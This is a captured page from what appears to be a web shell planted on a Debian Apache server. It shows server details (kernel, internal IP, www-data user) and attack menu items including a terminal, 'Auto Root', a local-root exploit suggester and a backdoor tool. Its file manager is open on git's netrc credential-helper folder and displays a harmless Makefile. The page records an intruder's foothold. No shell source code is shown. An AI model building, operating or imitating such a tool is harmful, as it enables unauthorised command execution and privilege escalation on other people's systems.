Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
git /
contrib /
credential /
netrc /
Delete
Unzip
Name
Size
Permission
Date
Action
Makefile
694
B
-rw-r--r--
2024-05-31 00:35
git-credential-netrc.perl
10.62
KB
-rw-r--r--
2024-05-31 00:35
t-git-credential-netrc.sh
430
B
-rw-r--r--
2024-05-31 00:35
test.command-option-gpg
75
B
-rw-r--r--
2024-05-31 00:35
test.git-config-gpg
71
B
-rw-r--r--
2024-05-31 00:35
test.netrc
337
B
-rw-r--r--
2024-05-31 00:35
test.pl
4.12
KB
-rw-r--r--
2024-05-31 00:35
Save
Rename
# The default target of this Makefile is... all:: SCRIPT_PERL = git-credential-netrc.perl GIT_ROOT_DIR = ../../.. HERE = contrib/credential/netrc SCRIPT_PERL_FULL = $(patsubst %,$(HERE)/%,$(SCRIPT_PERL)) all:: build build: $(MAKE) -C $(GIT_ROOT_DIR) SCRIPT_PERL="$(SCRIPT_PERL_FULL)" \ build-perl-script install: build $(MAKE) -C $(GIT_ROOT_DIR) SCRIPT_PERL="$(SCRIPT_PERL_FULL)" \ install-perl-script clean: $(MAKE) -C $(GIT_ROOT_DIR) SCRIPT_PERL="$(SCRIPT_PERL_FULL)" \ clean-perl-script test: build ./t-git-credential-netrc.sh testverbose: build ./t-git-credential-netrc.sh -d -v .PHONY: all build install clean test testverbose